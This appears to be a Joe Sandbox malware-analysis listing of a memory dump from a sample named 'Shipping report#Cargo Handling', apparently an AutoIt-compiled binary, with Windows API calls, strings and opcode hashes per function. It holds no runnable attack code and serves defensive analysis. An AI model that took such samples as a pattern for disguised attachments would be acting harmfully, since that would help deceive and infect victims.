Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CrackInternet_wcslen
String ID: |
API String ID: 596671847-2343686810
Opcode ID: a2de67461d055f02676a6aaac8e53f6b73a16ef2ce4a49cb283d25dd600e85d0
Instruction ID: 98e33f44ab0bbf48d8b2dc22f9542d9f8b94441d3080b3bd9ee06b1efdca4cf5
Opcode Fuzzy Hash: a2de67461d055f02676a6aaac8e53f6b73a16ef2ce4a49cb283d25dd600e85d0
Instruction Fuzzy Hash: E9313B71D00209ABCF15EFA4DC85AEEBFB9FF04340F000059F815A6262EB71AA56DB60

Function 0012356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00123621
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0012365C

Strings

static, xrefs: 001235BC

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: c501213d253b5bb5adda1f5305ac2fca2f370cc65a0728127bdd3db1fab726c0
Instruction ID: 0b6c8792f38eba87969731ddf919eaaf8b85fd5cf9b757c51f271b9d23ee9f7b
Opcode Fuzzy Hash: c501213d253b5bb5adda1f5305ac2fca2f370cc65a0728127bdd3db1fab726c0
Instruction Fuzzy Hash: 01318171110614AEDB249F64DC40FFB73ADFF48710F108619F96597280DB35ADA1D760

Function 00124537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0012461F
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00124634

Strings

', xrefs: 0012458E

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 30c759f935299457ed15c1d16b26b9b539b9ce43aca174aa4e1be65e2bad207e
Instruction ID: cebf6b92dc11f904334524f8a0429e1d7421f15be990ec73bd1bfac5c9468999
Opcode Fuzzy Hash: 30c759f935299457ed15c1d16b26b9b539b9ce43aca174aa4e1be65e2bad207e
Instruction Fuzzy Hash: 70314A74A00319AFDF14CFA9D980BDA7BB5FF09300F14406AE904AB381D770A951CF90

Function 001231EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0012327C
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00123287

Strings

Combobox, xrefs: 00123249

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend
String ID: Combobox
API String ID: 3850602802-2096851135
Opcode ID: 89d81c37a03c48b104850109d5c0dc8e0b923a3e59fbd7d779fbd1812ba8b31b
Instruction ID: c77f9181e9268942ec488857b39056399f2a1f4c57992804eb1d6b31b3971c90
Opcode Fuzzy Hash: 89d81c37a03c48b104850109d5c0dc8e0b923a3e59fbd7d779fbd1812ba8b31b
Instruction Fuzzy Hash: 5811E271300218BFEF219F54EC81EFB3B6AEB943A4F100124F928A7290D7359D619760

Function 00123710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 0009600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0009604C
Part of subcall function 0009600E: GetStockObject.GDI32(00000011), ref: 00096060
Part of subcall function 0009600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 0009606A

GetWindowRect.USER32(00000000,?), ref: 0012377A
GetSysColor.USER32(00000012), ref: 00123794

Strings

static, xrefs: 00123757

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$ColorCreateMessageObjectRectSendStock
String ID: static
API String ID: 1983116058-2160076837
Opcode ID: 5fe81861b110524945d61560e614649717b07aa8d50c12287a1d253d86685a17
Instruction ID: ed23a715c40e822f9414348b02a3fd82e11a9ad8162217c13a9d806820c43e51
Opcode Fuzzy Hash: 5fe81861b110524945d61560e614649717b07aa8d50c12287a1d253d86685a17
Instruction Fuzzy Hash: AF1129B261021AAFDF11DFA8DC45AEE7BB8FB08354F004514FA65E2250E775E8619B90

Function 0010CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0010CD7D
InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0010CDA6

Strings

<local>, xrefs: 0010CD66

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Internet$OpenOption
String ID: <local>
API String ID: 942729171-4266983199
Opcode ID: 1ff661c8bcfce0e7434782f2cdc67b3a90fc458601d23bd04a0e7395d7c9633c
Instruction ID: ae87e74233521e4474785400d6d507ef5b70df70b3d5a09ce9e33a1c84317a91
Opcode Fuzzy Hash: 1ff661c8bcfce0e7434782f2cdc67b3a90fc458601d23bd04a0e7395d7c9633c
Instruction Fuzzy Hash: 7E11C671215631BAD7384BA68C45EE7BE6CEF127A4F004336B189830C0D7B09845DBF0

Function 00123429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON

Download Yara Rule

APIs

GetWindowTextLengthW.USER32(00000000), ref: 001234AB
SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 001234BA

Strings

edit, xrefs: 0012348F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: LengthMessageSendTextWindow
String ID: edit
API String ID: 2978978980-2167791130
Opcode ID: eb13f4fe132eeb190242212a6d90f7d63affe355b964303702965fa1295e95f4
Instruction ID: 2bf33bb5370ae32e0a43407bcc882996899171bab1330aa338f1bec86c294e70
Opcode Fuzzy Hash: eb13f4fe132eeb190242212a6d90f7d63affe355b964303702965fa1295e95f4
Instruction Fuzzy Hash: 7A11BF71100168AFEF226E64EC44AEB376AEB04374F504364FA70931D0C779DCA1AB60

Function 000F6C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

CharUpperBuffW.USER32(?,?,?), ref: 000F6CB6
_wcslen.LIBCMT ref: 000F6CC2

Strings

STOP, xrefs: 000F6CBC, 000F6CC1

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: STOP
API String ID: 1256254125-2411985666
Opcode ID: 84be0e51a171ab18bac15b7eb0b44568286ef26fc96275153ad298bc2a703e5f
Instruction ID: 93719aa46b1f164e6b30e6beb85dd0197d9de47051073b1b1851c6fed280310b
Opcode Fuzzy Hash: 84be0e51a171ab18bac15b7eb0b44568286ef26fc96275153ad298bc2a703e5f
Instruction Fuzzy Hash: 19012B32A0052A9BCB209FBDDC408FF33F5EB61710B000538E9A297595EB33D900E690

Function 000F1CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

Part of subcall function 000F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000F3CCA

SendMessageW.USER32(?,000001A2,000000FF,?), ref: 000F1D4C

Strings

ComboBox, xrefs: 000F1CEB
ListBox, xrefs: 000F1D16

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: f297b8d16e4469c2f7c0896cad5180165d15c2c52aa7fc8330a35daed4052f9e
Instruction ID: 7c1ede9a9e0b256a785625d112a0a0e89d2d34dfed4134c0338e0a9becba34f3
Opcode Fuzzy Hash: f297b8d16e4469c2f7c0896cad5180165d15c2c52aa7fc8330a35daed4052f9e
Instruction Fuzzy Hash: AC01B57160121CEBCF14EBA4CC558FE73B9EB46350B04051EA932676D2EA315908A760

Function 000F1BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

Part of subcall function 000F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000F3CCA

SendMessageW.USER32(?,00000180,00000000,?), ref: 000F1C46

Strings

ComboBox, xrefs: 000F1BE5
ListBox, xrefs: 000F1C10

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 45a3ba666aafc1f68c7e8c8366f3e330915f655c2b20e0b0b35580d3a301e784
Instruction ID: 8a74477d27b526edd2793836ee557125e064002de26dc9cad1b857a3f9c6b6f0
Opcode Fuzzy Hash: 45a3ba666aafc1f68c7e8c8366f3e330915f655c2b20e0b0b35580d3a301e784
Instruction Fuzzy Hash: 8301A77568110CA6CF14EB94CD669FF77E99B11340F14001DAA1677682EA24AE0CE7F1

Function 000F1C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

Part of subcall function 000F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000F3CCA

SendMessageW.USER32(?,00000182,?,00000000), ref: 000F1CC8

Strings

ComboBox, xrefs: 000F1C69
ListBox, xrefs: 000F1C94

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 57ef34c628bfa47811e31ca9536ceebdbfb23492c4568bcc95cca8171955e115
Instruction ID: 9dc1500fceb7367e03d7a22a016f588cc4b3204708d6947817c4c62ceecae655
Opcode Fuzzy Hash: 57ef34c628bfa47811e31ca9536ceebdbfb23492c4568bcc95cca8171955e115
Instruction Fuzzy Hash: E201D6B1A8011CA7CF14EBA5CE12AFF77E89B11340F540029B91277682EA219F08E6F1

Function 000F1D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

Part of subcall function 000F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000F3CCA

SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 000F1DD3

Strings

ComboBox, xrefs: 000F1D75
ListBox, xrefs: 000F1DA0

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ClassMessageNameSend_wcslen
String ID: ComboBox$ListBox
API String ID: 624084870-1403004172
Opcode ID: 897b25afe5a2b59317935b380dbe1021642122ff16b235bd2c998a1f1ec65df3
Instruction ID: 878ad7941e5e4be986fc17df9439e6ff4bdd51caf0ee12b0be7fbc92654e4e63
Opcode Fuzzy Hash: 897b25afe5a2b59317935b380dbe1021642122ff16b235bd2c998a1f1ec65df3
Instruction Fuzzy Hash: F9F0A471A4121CA6DF14EBA9CC66AFF77B8AB01350F440919B932676C2DA645908A2A0

Function 0011747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00117493
_wcslen.LIBCMT ref: 001174B9

Strings

3, 3, 16, 1, xrefs: 00117483

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen
String ID: 3, 3, 16, 1
API String ID: 176396367-3042988571
Opcode ID: dfa1818866577a364936cf3f393b511e43c421a4280c2feb12359dcbb4a12eac
Instruction ID: adfcb8286393765da6d7af28297ee2086cd5f070e89a1153178dea0387973081
Opcode Fuzzy Hash: dfa1818866577a364936cf3f393b511e43c421a4280c2feb12359dcbb4a12eac
Instruction Fuzzy Hash: F7E02B022042201093351279ACC19FF5699DFC97A0714183BF981C23E7EB948ED193A0

Function 000F0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 000F0B23

Strings

Error allocating memory., xrefs: 000F0B1C
AutoIt, xrefs: 000F0B17

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: 19bf3e36eb64f765b0a6462ca82b2885e2a8ce61f8c2c1bb4a15aa3b9a6669c5
Instruction ID: bd8dd0ed2b5d322334ad29e0bcac6d00f2264418f4eeb4389ffd6474b589c907
Opcode Fuzzy Hash: 19bf3e36eb64f765b0a6462ca82b2885e2a8ce61f8c2c1bb4a15aa3b9a6669c5
Instruction Fuzzy Hash: C2E0D83124431876D22037D47C03FDD7AC58F05B55F100426FB58554C38BE265B056E9

Function 000B0D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 000AF7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,000B0D71,?,?,?,0009100A), ref: 000AF7CE

IsDebuggerPresent.KERNEL32(?,?,?,0009100A), ref: 000B0D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0009100A), ref: 000B0D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 000B0D7F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 24a0bd51470b5e7b46cb03ce69fb5eb89b105766feda41fbbdd96337febe7971
Instruction ID: 67af0f6c4154541bf800a82741a35d9d7076102b8c1a55d8002cdac009874da0
Opcode Fuzzy Hash: 24a0bd51470b5e7b46cb03ce69fb5eb89b105766feda41fbbdd96337febe7971
Instruction Fuzzy Hash: 4BE06D742003118BD3709FB8E8083967BF0AF00740F01892DE482C6A92DBB5E4858BD1

Function 00103017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(00000104,?,00000001), ref: 0010302F
GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00103044

Strings

aut, xrefs: 00103038

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: aut
API String ID: 3285503233-3010740371
Opcode ID: 173a2cba7bbeb1dfc6aa617b47030161c8dfc35e9136572d66705a5584ccd304
Instruction ID: 3e9742c23611ce5345877e1a4c87fd9506b3c2b81765a77f17c3cc24da474426
Opcode Fuzzy Hash: 173a2cba7bbeb1dfc6aa617b47030161c8dfc35e9136572d66705a5584ccd304
Instruction Fuzzy Hash: 1FD05E72500328B7DA30A7A4AC0EFCB7A7CDB04751F4002A1BB55E7091DEB09985CAD0

Function 000ED21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 000ED220

Strings

X64, xrefs: 000ED2A8
%.3d, xrefs: 000ED22B

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: 9ad7737afa28376447b12d2fad47bba5b31375bc5687a48f9812196f9896266b
Instruction ID: 5f1fdd7798af5dc16502fa10ba7a354e82cf34c8ba34359bd2e394027fddf5d9
Opcode Fuzzy Hash: 9ad7737afa28376447b12d2fad47bba5b31375bc5687a48f9812196f9896266b
Instruction Fuzzy Hash: E2D01261808149EDCBB096E1DC459FDB37CFB29341F508457FA17B1040D724C5486761

Function 00122322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0012232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 0012233F

Part of subcall function 000FE97B: Sleep.KERNEL32 ref: 000FE9F3

Strings

Shell_TrayWnd, xrefs: 00122325

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 2ea31e385e2bb8278bd9f0357433f64552aed1335eaf467fe9bcf0bf9b019c11
Instruction ID: c4e45dfffe9910327c0e2f149d6a32500a7a243c53067914638a5aa3c1b2142a
Opcode Fuzzy Hash: 2ea31e385e2bb8278bd9f0357433f64552aed1335eaf467fe9bcf0bf9b019c11
Instruction Fuzzy Hash: 9BD02232394300F7E274B730DC0FFCE7A049B00B00F004A027705AA1E0C9F0A842CA90

Function 00122356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0012236C
PostMessageW.USER32(00000000), ref: 00122373

Part of subcall function 000FE97B: Sleep.KERNEL32 ref: 000FE9F3

Strings

Shell_TrayWnd, xrefs: 00122365

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
